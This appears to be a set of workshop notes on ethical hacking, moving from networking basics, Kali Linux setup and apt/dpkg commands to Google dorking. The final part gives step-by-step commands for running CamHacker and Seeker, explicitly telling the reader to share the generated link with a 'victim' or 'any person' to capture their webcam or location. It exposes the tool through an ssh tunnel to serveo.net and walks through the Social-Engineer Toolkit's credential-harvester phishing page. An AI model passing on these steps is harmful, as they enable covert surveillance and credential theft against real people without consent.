PSNA Dec 2024
PSNA Dec 2024
com/psnadec24
https://cdimage.kali.org/kali-2024.3/kali-linux-2024.3-virtualbox-amd64.7z
Introduction
Hacking
Ethical Hacking
Cyber Security
Cyber Safety
System Configuration
Processor
Motherboard
RAM
Graphics Cards
SSD / HDD
ROM
Networking
IP
Pubic ip
https://whatismyipaddress.com/
Private IP
Open cmd “win +r → type cmd”
Ipconfig
→ ethernet / wifi adapter
Checking IP
Windows
Cmd → ipconfig
Checking system connectivity
Ping command
Cmd → ping <ip>
Traceroute
Type in cmd → tracert <website name>
Network layers
Layer level attack
Lab Setup
Virtual box - https://www.virtualbox.org/wiki/Downloads
Kali linux - https://www.kali.org/get-kali/#kali-virtual-machines
Username / password - kali / kali
Interface
Kali start menu
Minimize and maximize
File explorer
Mouse pad
Firefox
Terminal
Workspace
Task manager
Network connection
To change windows theme
Open terminal → (ctrl + alt+ t) → kali-undercover
Ip → ifconfig
Commands
Apt
Sudo - super user
Man - manual
Search- sudo apt-cache search vlc
Show - sudo apt-cache show vlc
Install - sudo apt-get install vlc
Remove - sudo apt-get remove vlc
Update - sudo apt-get update
Upgrade - sudo apt-get upgrade
Dpkg
https://www.teamviewer.com/en-in/download/linux/
Download - ubuntu / debian file x86 & 64
Open terminal → redirect to Downloads using → cd Downloads
Install - sudo dpkg -i <teamviewer.deb>
Remove - sudo dpkg -r teamviewer
Types of hacker
https://prezi.com/p/rh4chqucp5ea/ethical-hacking/
Tryhackme - https://tryhackme.com/
Hackthebox - https://account.hackthebox.com/login
Portswiggerlab - https://portswigger.net/users
Picoctf - https://play.picoctf.org/login
Password manager
https://bitwarden.com/
Day 2
Google search
● For recent search Google tools → any time to past hour / past week
● inurl
● intitle
● intext
● filetype:pdf/doc/ppt <keyword>
● index of <keyword>
● Site :uk / us /pk
● gHDB - https://www.exploit-db.com/google-hacking-database
Tools Execution
Kali Linux
Windows
Cam hacker
● https://github.com/KasRoudra2/CamHacker
● git clone https://github.com/KasRoudra2/CamHacker.git
● cd CamHacker
● ls
● bash ch.sh
● Copy link and share to victim
Location hacking
● https://github.com/thewhiteh4t/seeker.git
● git clone https://github.com/thewhiteh4t/seeker.git
● cd seeker
● Python seeker.py
● Seeker will run in port 8080
To generate public url access
● Open cmd → ssh -R 80:localhost:8080 serveo.net
● Copy and share link to any person and capture location
Phishing using xampp
Xampp Installation
Setoolkit
● Open kali linux terminal
● Type sudo setoolkit
● Choose option 1. Social engineering attack
● Choose option 2. Website attack vector
● Choose option 3.credential harvester attack
● Type ip address
● Type website name
● Hit enter
● Open browser and check the page by typing localhost
● Type username and password → check the setoolkit terminal